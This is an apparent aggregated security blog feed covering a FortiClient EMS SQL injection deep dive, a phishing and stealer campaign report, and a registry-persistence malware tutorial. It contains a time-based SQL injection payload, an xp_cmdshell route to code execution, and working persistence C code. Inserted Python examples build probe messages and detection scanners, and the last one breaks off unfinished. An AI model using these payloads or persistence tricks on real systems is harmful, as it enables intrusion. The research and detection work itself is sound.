Pentest/Red Team

The Cybersecurity Skills Gap: Time to Step Up with OffSec’s Red Teaming and IoT Learning Paths

By: OffSec
26 March 2024 at 17:08

The cybersecurity landscape is indeed challenged by a significant skills gap, with reports highlighting the critical shortage of professionals equipped to handle escalating cyber threats. The 2023 Global Cybersecurity Skills Gap Report from Fortinet underscores the urgency of this issue, revealing that a vast majority of organizations are facing more breaches due to a lack of skilled cybersecurity professionals. Specifically, the report found that 86% of decision-makers in cybersecurity recognize that the manpower shortage increases cyber risks for companies. 

OffSec is on a mission to address this critical challenge with its cutting-edge Red Teaming and Internet of Things (IoT) Learning Paths. These in-depth programs transcend generic tutorials, equipping learners with the real-world skills to tackle the complex security vulnerabilities in two of today’s most targeted areas.


The post The Cybersecurity Skills Gap: Time to Step Up with OffSec’s Red Teaming and IoT Learning Paths appeared first on OffSec.

Horizon3.ai Garners Spot in 2024 CRN® Partner Program Guide

25 March 2024 at 14:12

Business Wire 03/25/2024

Horizon3.ai, a pioneer in autonomous security solutions, has been honored by CRN®, a brand of The Channel Company, with inclusion in its 2024 Partner Program Guide. This annual guide provides essential information to solution providers exploring technology vendor partner programs…


The post Horizon3.ai Garners Spot in 2024 CRN® Partner Program Guide appeared first on Horizon3.ai.

CISSP is changing! Common body of knowledge changes for 2024 | Cyber Work Hacks

By: Infosec
21 March 2024 at 18:00

Cyber Work Hacks is back to keep you updated with the CISSP exam! Infosec boot camp instructor Steve Spearman joins me to tell us about the new changes to the CISSP’s common body of knowledge (CBK) and how the changes to the CBK should (or shouldn’t!) affect your study and preparation for the exam! Keep learning, and keep it here for another Cyber Work Hack.

– Learn more about the CISSP: https://www.infosecinstitute.com/training/cissp/
– Get your free ebook, "CISSP exam tips and tricks (to ace your exam on the first try)": https://www.infosecinstitute.com/form/cissp-exam-tips-ebook/
 
0:00 - CISSP exam common body of knowledge
1:16 - Changes to CISSP's CBK
7:45 - Why did CISSP make CBK changes?
9:17 - How to study for the CISSP
11:37 - Most important CISSP exam items
14:04 - Best advice for taking the CISSP exam
15:03 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.


Citrix ADC – Unexpected Treasure

By: Ylabs
21 March 2024 at 16:31
TL;DR: Setting secure rules for the RelayState parameter is a MUST when configuring Citrix Application Delivery Controller (ADC) and Citrix Gateway as a SAML Service Provider, because an attacker can exploit a chain of three low-risk vulnerabilities to compromise victims’ accounts. By luring users to a malicious domain, attackers can steal session cookies and gain unauthorized […]

Elevate Your Cybersecurity Strategy: Download the 2023 Year in Review

22 March 2024 at 13:00

In our groundbreaking 2023 Year in Review, Horizon3.ai delves into the transformative approach of autonomous pentesting with NodeZero. This pivotal document is your gateway to mastering proactive cybersecurity defense mechanisms.

Here’s what you'll discover:

The Attacker's Perspective

Learn how thinking like an attacker can uncover hidden vulnerabilities.

Overcoming Common Cyber Threats

Insight into the most prevalent cybersecurity challenges today, including credential issues and software vulnerabilities.

Innovative Mitigation Strategies

Practical guidance on enhancing your security posture through advanced mitigation techniques.

Policy Recommendations

Expert advice on shaping policies to bolster your defenses against emerging threats.

Continuous Security Assessment

The importance of ongoing evaluation and adaptation to stay ahead of cyber adversaries.

Download now to unlock the secrets to a more resilient cybersecurity framework.

The post Elevate Your Cybersecurity Strategy: Download the 2023 Year in Review appeared first on Horizon3.ai.

CVE-2023-48788: Fortinet FortiClient EMS SQL Injection Deep Dive

21 March 2024 at 10:58

Introduction

In a recent PSIRT advisory, Fortinet acknowledged CVE-2023-48788, a SQL injection in FortiClient EMS that can lead to remote code execution. FortiClient EMS is an endpoint management solution for enterprises that provides a central location for administering enrolled endpoints. The SQL injection is caused by user-controlled strings being passed directly into database queries. In this post we examine the internal workings of the exploit. Our POC can be found here.

An improper neutralization of special elements used in an SQL Command (‘SQL Injection’) vulnerability [CWE-89] in FortiClientEMS may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted requests.

FortiClient EMS Architecture

For the purposes of understanding this vulnerability, FortiClient EMS consists of the following components:

  • FcmDaemon.exe – The main service responsible for communicating with enrolled clients. By default, this service listens on tcp/8013 for incoming client connections.
  • FCTDas.exe – The Data Access Server, which translates requests from the other server components into SQL queries. This service talks to the Microsoft SQL Server database.
  • One or more endpoint clients – These clients communicate with FcmDaemon.exe on the server (by default over tcp/8013).

Finding the Vulnerable Component

Since we know the vulnerability is a SQL injection, our initial triage consisted of scanning the installation folder for common SQL strings.

Search for SQL Strings

Upon further examination, we find that FCTDas.exe has established connections to the local database over tcp/1433. We also see that it listens for incoming connections on localhost, port tcp/65432.

FCTDas connections

Examining other services on this server, we find that FcmDaemon.exe makes connections to FCTDas.exe and listens externally on tcp/8013. We have a decent hunch now that we can use tcp/8013 to interact indirectly with FCTDas and make database queries.

Finding and Triggering the Vulnerability

We wanted to see what normal communications between a client and the FcmDaemon should look like. To accomplish this, we configured an installer and deployed a basic endpoint client. We found that normal communications between an endpoint client and FcmDaemon.exe are encrypted with TLS, and there didn’t seem to be an easy way to dump TLS session keys to decrypt the legitimate traffic. Luckily, after we enabled Debug logging, the FcmDaemon log provided some detail about the communications.

FcmDaemon Logs

This was enough information to get us started with a Python script to communicate with the FcmDaemon; however, we weren’t able to get it to respond with anything besides a continuation message.

At this point, we opened FcmDaemon.exe in IDA and began reverse engineering the message format. We noticed that many of the message-handling functions used functionality from policyhelper.dll. Instead of reverse engineering the entire message format, we opened WinDbg and set a breakpoint on policyhelper!processRequest. After some time, the client beaconed to the server and we were able to see the message buffer in rdx.

Using WinDbg to examine the message format

We can see that the message format is a simple text-based one: a message header with various fields, each separated by a newline; a carriage return and newline separating the header from the body; and two carriage-return/newline pairs ending the body. With this information, we were able to update our Python script to communicate meaningfully with the FcmDaemon.

In the DAS log, we were able to see many SQL statements that used the FCTUID as part of the query. For example:

SQL query in DAS log

Based on this, we were hopeful that simply changing the FCTUID present in many of the FcmDaemon messages would trigger a SQL injection. We constructed a simple sleep payload of the form <fctid>' AND 1=0; WAITFOR DELAY '00:00:10' -- '. We observed the 10-second delay in the response and knew that we had triggered the injection!
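The framing described above and the time-based probe, as an added example that is not Horizon3's POC and not FortiClient code. The write-up documents only the separators, so the `key=value` shape of a header field, the field names `MSG` and `FCTUID`, and the stand-in server (which merely imitates the delay a vulnerable backend would introduce) are assumptions made for the example; the `send` callable is whatever transport you have.

```python
r"""Added example (not Horizon3's POC): the FcmDaemon message framing described
above, a helper that drops the time-based probe into the FCTUID field, and a
stand-in server so the timing check can be exercised offline.

Assumptions, not taken from the write-up: header fields are serialised as
key=value (only the separators are documented), the field names below are
placeholders, and the stand-in server only imitates the delay behaviour."""
import re
import time

HEADER_BODY_SEP = "\r\n"       # one CRLF between header and body
BODY_TERMINATOR = "\r\n\r\n"   # two CRLFs close the message
HEADER_LINE_SEP = "\n"         # header fields are newline-separated


def build_message(header: dict, body: str = "") -> bytes:
    """Serialise one FcmDaemon-style message; field order is preserved."""
    for v in header.values():
        if "\n" in str(v) or "\r" in str(v):
            raise ValueError("newline inside a header field would corrupt the framing")
    header_text = HEADER_LINE_SEP.join(f"{k}={v}" for k, v in header.items())
    return (header_text + HEADER_BODY_SEP + body + BODY_TERMINATOR).encode()


def parse_message(raw: bytes):
    """Inverse of build_message; rejects messages whose framing is broken."""
    text = raw.decode()
    if not text.endswith(BODY_TERMINATOR):
        raise ValueError("missing body terminator (two CRLFs)")
    text = text[: -len(BODY_TERMINATOR)]
    header_text, sep, body = text.partition(HEADER_BODY_SEP)
    if not sep:
        raise ValueError("missing header/body separator (one CRLF)")
    header = {}
    for line in header_text.split(HEADER_LINE_SEP):
        key, _, value = line.partition("=")   # split at the first '=' only
        header[key] = value
    return header, body


def sleep_payload(fctuid: str, seconds: int = 10) -> str:
    """The probe from the write-up: close the quoted FCTUID, stack a WAITFOR, comment out the rest."""
    return f"{fctuid}' AND 1=0; WAITFOR DELAY '00:00:{seconds:02d}' -- '"


def timed_exchange(send, message: bytes):
    """send() is any transport callable; returns (response, elapsed seconds)."""
    start = time.monotonic()
    response = send(message)
    return response, time.monotonic() - start


def delay_confirmed(elapsed: float, expected: float, baseline: float = 0.0, slack: float = 1.0) -> bool:
    """True when the round trip took roughly the injected delay longer than a normal one."""
    return elapsed - baseline >= expected - slack


_DELAY_RE = re.compile(r"WAITFOR DELAY '00:00:(\d\d)'")


def fake_vulnerable_daemon(message: bytes) -> bytes:
    """Stand-in for a vulnerable server: sleeps for any WAITFOR it finds in FCTUID."""
    header, _ = parse_message(message)
    m = _DELAY_RE.search(header.get("FCTUID", ""))
    if m:
        time.sleep(int(m.group(1)))
    return b"CONTINUE"   # placeholder for the continuation message the write-up mentions


if __name__ == "__main__":
    # The FCTUID below is constructed and the field names are placeholders.
    normal = build_message({"MSG": "BEACON", "FCTUID": "0123456789abcdef"})
    probe = build_message({"MSG": "BEACON", "FCTUID": sleep_payload("0123456789abcdef", 2)})
    _, base = timed_exchange(fake_vulnerable_daemon, normal)
    _, hit = timed_exchange(fake_vulnerable_daemon, probe)
    print(f"baseline {base:.2f}s, probe {hit:.2f}s, injectable: {delay_confirmed(hit, 2, base)}")
```

Measure a baseline first and compare against it, as `delay_confirmed` does: a slow TLS handshake or a busy server looks like a hit if you only check the absolute time.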

From SQL Injection to RCE

To turn this SQL injection vulnerability into remote code execution we used the built-in xp_cmdshell functionality of Microsoft SQL Server. Initially, the database was not configured to run the xp_cmdshell command, however it was trivially enabled with a few other SQL statements. The POC we are releasing only confirms the vulnerability by using a simple SQL injection without xp_cmdshell. To enable RCE, altering the POC is necessary.

Indicators of Compromise

There are various log files in C:\Program Files (x86)\Fortinet\FortiClientEMS\logs that can be examined for connections from unrecognized clients or other malicious activity. The MS SQL logs can also be examined for evidence of xp_cmdshell being utilized to obtain command execution.

xp_cmdshell logs

It’s important to realize that an attacker may have used different techniques to gain execution, or may have cleaned evidence from the logs after exploitation.
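A log sweep for the two indicators named above, as an added example that is not part of the write-up: tampered FCTUID values in the DAS log's SQL statements, and xp_cmdshell being switched on in the SQL Server ERRORLOG. The DAS log line layout and the table name in the sample are constructed for the example (the real files differ); the ERRORLOG message text is SQL Server's own wording for an sp_configure change.

```python
r"""Added example (not from the write-up): sweep the DAS log for SQL injection in
FCTUID-bearing queries and the SQL Server ERRORLOG for xp_cmdshell being enabled.

The DAS log line layout and table name below are constructed for the example;
the ERRORLOG message is SQL Server's wording for an sp_configure change."""
import re
from dataclasses import dataclass

SQLI_PATTERNS = [
    (re.compile(r"WAITFOR\s+DELAY", re.I), "time-based blind probe (WAITFOR DELAY)"),
    (re.compile(r"xp_cmdshell", re.I), "xp_cmdshell referenced from an endpoint query"),
    (re.compile(r"'\s*(AND|OR)\s+\d+\s*=\s*\d+", re.I), "boolean tautology after a closed quote"),
    (re.compile(r";\s*(EXEC|EXECUTE|SELECT|INSERT|UPDATE|DELETE|DROP|WAITFOR)\b", re.I), "stacked statement"),
    (re.compile(r"--\s*'*\s*$"), "trailing comment that swallows the rest of the query"),
]
XP_CMDSHELL_ON = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")


@dataclass(frozen=True)
class Finding:
    source: str
    line_no: int
    reason: str
    line: str


def scan_das_log(lines, source="FCTDas"):
    """Flag queries whose FCTUID has clearly been tampered with.
    Only lines carrying an FCTUID predicate are examined."""
    findings = []
    for n, line in enumerate(lines, 1):
        if "FCTUID" not in line:
            continue
        for pattern, reason in SQLI_PATTERNS:
            if pattern.search(line):
                findings.append(Finding(source, n, reason, line.rstrip()))
    return findings


def scan_sql_errorlog(lines, source="ERRORLOG"):
    """Flag the sp_configure event that turns xp_cmdshell on."""
    return [Finding(source, n, "xp_cmdshell enabled via sp_configure", line.rstrip())
            for n, line in enumerate(lines, 1) if XP_CMDSHELL_ON.search(line)]


# Constructed samples: a benign endpoint query, the sleep probe, an xp_cmdshell attempt.
SAMPLE_DAS_LOG = """\
2024-03-21 10:58:01 [INFO] SELECT * FROM fct_endpoints WHERE FCTUID = 'A1B2C3D4' AND deleted = 0
2024-03-21 10:58:07 [INFO] SELECT * FROM fct_endpoints WHERE FCTUID = 'A1B2C3D4' AND 1=0; WAITFOR DELAY '00:00:10' -- '' AND deleted = 0
2024-03-21 10:58:20 [INFO] SELECT * FROM fct_endpoints WHERE FCTUID = 'A1B2C3D4'; EXEC master..xp_cmdshell 'whoami' -- ''
""".splitlines()

SAMPLE_ERRORLOG = """\
2024-03-21 11:02:15.43 spid57      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-21 11:02:15.51 spid57      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
""".splitlines()


def sweep(das_lines=SAMPLE_DAS_LOG, errorlog_lines=SAMPLE_ERRORLOG):
    """Run both scans and return every Finding."""
    return scan_das_log(das_lines) + scan_sql_errorlog(errorlog_lines)


if __name__ == "__main__":
    for f in sweep():
        print(f"{f.source}:{f.line_no}: {f.reason}\n    {f.line}")
```

The ERRORLOG check only catches the sp_configure route; an attacker who already has sysadmin in the database can reach command execution other ways, which is the point of the caveat above.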

NodeZero

NodeZero Attack Path utilizing CVE-2023-48788 to load a remote access tool and dump LSASS 

Horizon3.ai clients and free-trial users alike can run a NodeZero operation to determine the exposure and exploitability of this issue.

Sign up for a free trial and quickly verify you’re not exploitable.


The post CVE-2023-48788: Fortinet FortiClient EMS SQL Injection Deep Dive appeared first on Horizon3.ai.

Fluffy Wolf sends out reconciliation reports to sneak into corporate infrastructures

By: BI.ZONE
19 March 2024 at 12:01

The group has adopted a simple yet effective approach to gain initial access: phishing emails with an executable attachment. This way, Fluffy Wolf establishes remote access, steals credentials, or exploits the compromised infrastructure for mining.

The BI.ZONE Threat Intelligence team has detected a previously unknown cluster, dubbed Fluffy Wolf, whose activity can be traced back to 2022. The group uses phishing emails with password-protected archive attachments. The archives contain executable files disguised as reconciliation reports. They are used to deliver various tools to a compromised system, such as Remote Utilities (legitimate software), Meta Stealer, WarZone RAT, or XMRig miner.

Key findings

  1. Phishing emails remain an effective method of intrusion: at least 5% of corporate employees download and open hostile attachments.
  2. Threat actors continue to experiment with legitimate remote access software to enhance their arsenal with new tools.
  3. Malware-as-a-service programs and their cracked versions are expanding the threat landscape in Russia and other CIS countries. They also enable attackers with mediocre technical skills to advance attacks successfully.

The campaign

One of the latest campaigns began with the attackers sending out phishing emails, pretending to be a construction firm (fig. 1). The message titled Reports to sign had an archive with the password included in the file name.

Fig. 1. Phishing email

The archive contained a file Akt_Sverka_1C_Doc_28112023_PDF.com (a reconciliation report) that downloaded and installed Remote Utilities (a remote access tool) and launched Meta Stealer.

When executed, the malicious file performed the following actions:

  • replicated itself in the directory C:\Users\[user]\AppData\Roaming, for example, as Znruogca.exe (specified in the configuration)
  • created a Znruogca value, with the replicated file path as its data, under HKCU\Software\Microsoft\Windows\CurrentVersion\Run so that the malware runs again after a reboot
  • launched the Remote Utilities loader that delivers the payload from the C2 server
  • started a copy of the active process and injected Meta Stealer’s payload into it

The Remote Utilities installer is an NSIS (Nullsoft Scriptable Install System) package that copies the program modules to C:\ProgramData\TouchSupport\Bin and runs the Remote Utilities executable, wuapihost.exe.

Remote Utilities is a legitimate remote access tool that enables a threat actor to gain complete control over a compromised device. Thus, they can track the user’s actions, transmit files, run commands, interact with the task scheduler, etc. (fig. 2).

Fig. 2. Remote Utilities official website

Meta Stealer is a clone of the popular RedLine stealer which is frequently used in attacks against organizations in Russia and other CIS countries. Among others, this stealer was employed by the Sticky Wolf cluster.

The stealer can be purchased on underground forums and through the official Telegram channel (fig. 3).

Fig. 3. Message in the Telegram channel

A monthly subscription for the malware may cost as little as 150 dollars while a lifetime license can be purchased for 1,000 dollars. It is noteworthy that Meta Stealer is not banned in the CIS countries.

The stealer allows the attackers to retrieve the following information about the system:

  • username
  • screen resolution
  • operating system version
  • operating system language
  • unique identifier (domain name + username + device serial number)
  • time zone
  • CPU (by sending a WMI request SELECT * FROM Win32_Processor)
  • graphics cards (by sending a WMI request SELECT * FROM Win32_VideoController)
  • browsers (by enumerating the registry keys SOFTWARE\WOW6432Node\Clients\StartMenuInternet and SOFTWARE\Clients\StartMenuInternet)
  • software (by enumerating the registry key SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall)
  • security solutions (by sending WMI requests SELECT * FROM AntivirusProduct, SELECT * FROM AntiSpyWareProduct and SELECT * FROM FirewallProduct)
  • processes running (by sending a WMI request SELECT * FROM Win32_Process Where SessionId='[running process session]')
  • keyboard layouts
  • screenshots

Then it collects and sends the following information to the C2 server:

  • files that match the mask specified in the configuration
  • credentials and cookies from Chromium and Firefox-like browsers (browser paths are specified in the configuration)
  • FileZilla data
  • cryptocurrency wallet data (specified in the configuration)
  • data from the VPN clients installed on the compromised device (NordVPN, ProtonVPN)

We were also able to link this cluster to some previous campaigns that used different sets of tools:

  • a universal loader that spreads the payloads of the Remote Utilities installer and the Meta Stealer
  • an installer with the Meta Stealer payload that downloads Remote Utilities from the C2 server
  • the Remote Utilities installer only, without Meta Stealer
  • WarZone RAT, another malware-as-a-service solution, instead of Remote Utilities
  • a loader for Remote Utilities, Meta Stealer, and WarZone RAT in a single file
  • a miner as an additional tool

Conclusions

The duration and variety of attacks conducted by clusters of activity such as Fluffy Wolf prove their effectiveness. Despite the use of fairly simple tools, the threat actors are able to achieve complex goals. This once again highlights the importance of threat intelligence. Having access to the latest data, companies can promptly detect and eliminate malicious activity at the early stages of the attack cycle.

Indicators of compromise

bussines-a[.]ru
3aaa68af37f9d0ba1bc4b0d505b23f10a994f7cfd9fdf6a5d294c7ef5b4c6a6a
794d27b8f218473d51caa9cfdada493bc260ec8db3b95c43fb1a8ffbf4b4aaf7
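A small triage pass over the behaviours described in this report, as an added example that is not BI.ZONE's tooling: a Run value pointing at an executable dropped straight into AppData\Roaming (with the value name matching the file name, as Znruogca does), files in the Remote Utilities drop location C:\ProgramData\TouchSupport\Bin or named wuapihost.exe, and matches against the published hashes and domain. Only the IOC set comes from the report; the Run values, file list, hash export and log lines below are constructed for the example.

```python
r"""Added example (not BI.ZONE's tooling): triage checks for the TTPs described in
the report.  Only the IOC set is from the report; all sample data is constructed."""
import re
from pathlib import PureWindowsPath

IOC_SHA256 = {
    "3aaa68af37f9d0ba1bc4b0d505b23f10a994f7cfd9fdf6a5d294c7ef5b4c6a6a",
    "794d27b8f218473d51caa9cfdada493bc260ec8db3b95c43fb1a8ffbf4b4aaf7",
}
IOC_DOMAINS = {"bussines-a.ru"}          # refanged from bussines-a[.]ru
RU_DROP_DIR = ("programdata", "touchsupport", "bin")


def executable_from_command(command: str) -> str:
    """Program path out of a Run value: "quoted path" args, or bare path args."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split(" ")[0]


def classify_path(path_str: str) -> list:
    """Reasons a file path matches the report's TTPs (empty list = nothing notable)."""
    path = PureWindowsPath(path_str)
    parts = [p.lower() for p in path.parts]
    reasons = []
    # An .exe sitting directly in ...\AppData\Roaming, not in a vendor subfolder.
    if path.suffix.lower() == ".exe" and parts[-3:-1] == ["appdata", "roaming"]:
        reasons.append("executable dropped directly into AppData\\Roaming")
    if tuple(parts[-4:-1]) == RU_DROP_DIR or path.name.lower() == "wuapihost.exe":
        reasons.append("Remote Utilities drop location / wuapihost.exe")
    return reasons


def triage_run_values(values: dict) -> list:
    """values: Run value name -> command line.  Returns (name, reason) pairs."""
    findings = []
    for name, command in values.items():
        exe = executable_from_command(command)
        for reason in classify_path(exe):
            if name.lower() == PureWindowsPath(exe).stem.lower():
                reason += " (value name equals file name, as in the report)"
            findings.append((name, reason))
    return findings


def triage_file_list(paths) -> list:
    """Same checks over a plain file listing (e.g. an EDR inventory export)."""
    return [(p, r) for p in paths for r in classify_path(p)]


def match_hashes(observed) -> set:
    """Intersect a hash export with the published SHA-256 IOCs (case-insensitive)."""
    return {h.lower() for h in observed} & IOC_SHA256


_DOMAIN_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


def ioc_domains_in_log(lines) -> set:
    """Domains from the IOC list seen in proxy/DNS log lines."""
    return {d.lower() for line in lines for d in _DOMAIN_RE.findall(line) if d.lower() in IOC_DOMAINS}


# Constructed sample data.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Znruogca": r"C:\Users\bob\AppData\Roaming\Znruogca.exe",
}
SAMPLE_FILES = [
    r"C:\ProgramData\TouchSupport\Bin\wuapihost.exe",
    r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Themes\cached.bin",
]
SAMPLE_HASHES = [
    "3AAA68AF37F9D0BA1BC4B0D505B23F10A994F7CFD9FDF6A5D294C7EF5B4C6A6A",
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",  # sha256 of empty input
]
SAMPLE_LOG = [
    "2023-11-28 09:14:02 dns client=10.0.0.5 qname=bussines-a.ru qtype=A",
    "2023-11-28 09:14:05 dns client=10.0.0.5 qname=update.microsoft.com qtype=A",
]

if __name__ == "__main__":
    print(triage_run_values(SAMPLE_RUN_VALUES))
    print(triage_file_list(SAMPLE_FILES))
    print(match_hashes(SAMPLE_HASHES), ioc_domains_in_log(SAMPLE_LOG))
```

The path heuristics are deliberately narrow (an executable in the Roaming root, not just anywhere under it) to keep the noise down; widen them only with an allow-list for the legitimate software in your estate.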

MITRE ATT&CK

More indicators of compromise and a detailed description of threat actor tactics, techniques, and procedures are available on the BI.ZONE Threat Intelligence platform.

How to protect your company from such threats

Phishing emails are a popular attack vector against organizations. To protect your mail server, you can use specialized services that help to filter unwanted emails. One such service is BI.ZONE CESP. The solution eliminates the problem of illegitimate emails by inspecting every message. It uses over 600 filtering mechanisms based on machine learning, statistical, signature, and heuristic analysis. This inspection does not slow down the delivery of secure messages.

To stay ahead of threat actors, you need to be aware of the methods used in attacks against different infrastructures and to understand the threat landscape. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence platform. The solution provides information about current attacks, threat actors, their methods and tools. This data helps to ensure the effective operation of security solutions, accelerate incident response, and protect against the most critical threats to the company.

CISSP exam tips and tricks: Top test-taking strategies | Cyber Work Hacks

By: Infosec
15 March 2024 at 18:00

Infosec and Cyber Work Hacks are here to help you pass the CISSP exam. Today’s Hack is part two, so I encourage you to go back and listen to part one of Steve Spearman’s CISSP exam tips and tricks. In part two, I pass the mic to Spearman to give you his top five test-taking strategies for the CISSP. What’s the Sesame Street rule? How does the CISSP feel about absolutes? Keep it here, and you’ll find out in part two of this week’s Cyber Work Hack. 

– Learn more about the CISSP: https://resources.infosecinstitute.com/overview/cissp/
– Get your free ebook, "CISSP exam tips and tricks (to ace your exam on the first try)": https://www.infosecinstitute.com/form/cissp-exam-tips-ebook/

1:30 - Look for absolutes in questions
3:17 - The Sesame Street principle 
4:45 - Watch for algebraic equations 
6:23 - Look for the "golden words"
7:38 - Change management is likely the answer
8:55 - Keep an eye on senior management and impact
10:19 - Think like a CISO
11:53 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.


Malware development: persistence - part 24. StartupApproved. Simple C example.

12 March 2024 at 00:00

Hello, cybersecurity enthusiasts and white-hat hackers!


This post is based on my own research into another interesting malware persistence trick: the StartupApproved Registry key.

StartupApproved

In the very first post of this persistence series, I wrote about one of the most popular and by now classic techniques: Registry Run keys.

A less common Registry location, consulted by the standard “startup” processing (the part mostly driven by Windows Explorer, which also handles the Run and RunOnce keys, the Startup folder, etc.) after userinit.exe completes, is:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run

Turns out, this key is populated when entries are enabled or disabled via the Windows Task Manager’s Startup tab:


The good news is that we can use this registry path for persistence.

practical example

First of all, check Registry keys by the following command:

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved" /s


In the next step, as usual, we create our “evil” application (hack.c):

/*
hack.c
simple DLL messagebox
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html
*/

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  nReason, LPVOID lpReserved) {
  switch (nReason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(
      NULL,
      "Meow-meow!",
      "=^..^=",
      MB_OK
    );
    break;
  case DLL_PROCESS_DETACH:
    break;
  case DLL_THREAD_ATTACH:
    break;
  case DLL_THREAD_DETACH:
    break;
  }
  return TRUE;
}

As usual, just a meow-meow message box.

Then we modify the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run registry key, like this (pers.c):

/*
pers.c
windows persistence
via StartupApproved
author: @cocomelonc
https://cocomelonc.github.io/malware/2024/03/12/malware-pers-24.html
*/
#include <windows.h>
#include <stdio.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;

  BYTE data[] = {0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};

  const char* path = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run";
  const char* evil = "Z:\\2024-03-12-malware-pers-24\\hack.dll";

  LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR) path, 0, KEY_WRITE, &hkey);
  printf (res != ERROR_SUCCESS ? "failed open registry key :(\n" : "successfully open registry key :)\n");
  if (res != ERROR_SUCCESS) return 1; // no handle to write to

  res = RegSetValueEx(hkey, (LPCSTR)evil, 0, REG_BINARY, data, sizeof(data));
  printf(res != ERROR_SUCCESS ? "failed to set registry value :(\n" : "successfully set registry value :)\n");

  // close the registry key
  RegCloseKey(hkey);

  return 0;
}

As you can see, the logic of our proof of concept is pretty simple: we set the data of the registry value to the binary blob 0x02 0x00 ..., where the leading 0x02 marks the entry as enabled.
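The blue-team view of the same key, as an added example that is mine and not the author's PoC: decode what is stored in each StartupApproved\Run value and cross-check it against the Run key. The layout assumed here is the one Task Manager's Startup tab writes, a 12-byte REG_BINARY whose first DWORD is the state (0x02 enabled, 0x03 disabled) followed by a FILETIME that is non-zero only for disabled entries; any other state value is reported as unknown rather than guessed. The sample values are constructed; `read_live()` uses winreg and only works on Windows.

```python
r"""Added example (not the author's PoC): decode StartupApproved\Run values and
cross-check them against the Run key.

Layout as written by Task Manager's Startup tab: a 12-byte REG_BINARY, first
DWORD = state (0x02 enabled, 0x03 disabled), then a FILETIME that is non-zero
only when the entry was disabled.  Sample values below are constructed."""
import struct
from datetime import datetime, timedelta, timezone

STATE_ENABLED, STATE_DISABLED = 0x02, 0x03
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME = 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def decode_startup_approved(blob: bytes) -> dict:
    """Split a StartupApproved value into state and (optional) disable timestamp."""
    if len(blob) < 12:
        raise ValueError(f"expected at least 12 bytes, got {len(blob)}")
    state, ft = struct.unpack_from("<IQ", blob)
    return {
        "state": state,
        "status": {STATE_ENABLED: "enabled", STATE_DISABLED: "disabled"}.get(state, "unknown"),
        "disabled_at": filetime_to_datetime(ft) if ft else None,
    }


def cross_check(approved: dict, run: dict) -> list:
    r"""approved: StartupApproved\Run name -> REG_BINARY; run: Run name -> command."""
    findings = []
    for name, blob in approved.items():
        info = decode_startup_approved(blob)
        if name not in run:
            findings.append((name, f"{info['status']} flag with no matching Run value; review by hand"))
        elif info["status"] == "enabled":
            findings.append((name, f"enabled -> {run[name]}"))
        elif info["status"] == "disabled":
            findings.append((name, f"disabled at {info['disabled_at']:%Y-%m-%d %H:%M:%S} UTC -> {run[name]}"))
        else:
            findings.append((name, f"unknown state 0x{info['state']:02x} -> {run[name]}"))
    for name, command in run.items():
        if name not in approved:   # never toggled in Task Manager: treated as enabled
            findings.append((name, f"no StartupApproved entry (treated as enabled) -> {command}"))
    return findings


def read_live() -> list:
    """Windows only: pull both keys from HKCU with winreg and run the cross-check."""
    import winreg  # local import: the module does not exist on other platforms

    def dump(subkey):
        out, i = {}, 0
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey) as k:
            while True:
                try:
                    name, data, _ = winreg.EnumValue(k, i)
                except OSError:
                    return out
                out[name] = data
                i += 1

    return cross_check(dump(r"Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run"),
                       dump(r"Software\Microsoft\Windows\CurrentVersion\Run"))


# Constructed sample: one enabled entry, one disabled at the Unix epoch (as FILETIME),
# and the orphan value name this post's PoC writes.
UNIX_EPOCH_FILETIME = 116444736000000000
SAMPLE_APPROVED = {
    "OneDrive": struct.pack("<IQ", STATE_ENABLED, 0),
    "Updater": struct.pack("<IQ", STATE_DISABLED, UNIX_EPOCH_FILETIME),
    r"C:\temp\hack.dll": struct.pack("<IQ", STATE_ENABLED, 0),
}
SAMPLE_RUN = {
    "OneDrive": r'"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": r"C:\Users\bob\AppData\Roaming\Updater\updater.exe",
    "Zoom": r'"C:\Users\bob\AppData\Roaming\Zoom\bin\Zoom.exe"',
}

if __name__ == "__main__":
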